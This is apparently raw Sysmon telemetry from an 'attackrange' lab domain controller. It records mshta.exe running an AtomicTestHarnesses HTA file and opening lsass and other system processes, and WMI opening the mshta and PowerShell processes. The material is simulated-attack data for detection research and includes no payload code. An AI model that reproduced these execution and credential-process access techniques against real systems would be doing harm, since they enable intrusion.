exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000022792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.241{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.241{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.241{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.241{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.241{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.226{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.226{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.214{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.210{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 